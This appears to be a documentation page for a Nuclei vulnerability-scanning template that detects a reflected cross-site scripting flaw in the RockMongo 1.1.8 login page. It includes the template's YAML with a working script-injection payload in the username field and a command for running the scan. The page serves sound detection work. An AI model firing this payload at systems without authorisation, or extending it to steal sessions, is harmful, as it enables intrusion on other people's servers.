Skip to content

RockMongo 1.1.8 - Cross-Site Scripting

ID: rockmongo-xss

Severity: high

Author: pikpikcu

Tags: rockmongo,xss,packetstorm

RockMongo 1.1.8 contains a cross-site scripting vulnerability which allows attackers to inject arbitrary JavaScript into the response returned by the application.

id: rockmongo-xss
info:
name: RockMongo 1.1.8 - Cross-Site Scripting
author: pikpikcu
severity: high
description: RockMongo 1.1.8 contains a cross-site scripting vulnerability which allows attackers to inject arbitrary JavaScript into the response returned by the application.
reference:
- https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
max-request: 1
tags: rockmongo,xss,packetstorm
http:
- method: POST
path:
- "{{BaseURL}}/index.php?action=login.index"
headers:
Content-Type: application/x-www-form-urlencoded
body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
words:
- 'Content-Type: text/html'
part: header
# digest: 490a00463044022009d64dac7f03d48183f86ae1cc11252a0157da1943064956af27079d0f6fd827022072461407a38b20eb8275d05b848c15b0c08182f447525ed43863b1014c29b7eb:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/rockmongo-xss.yaml"

View on Github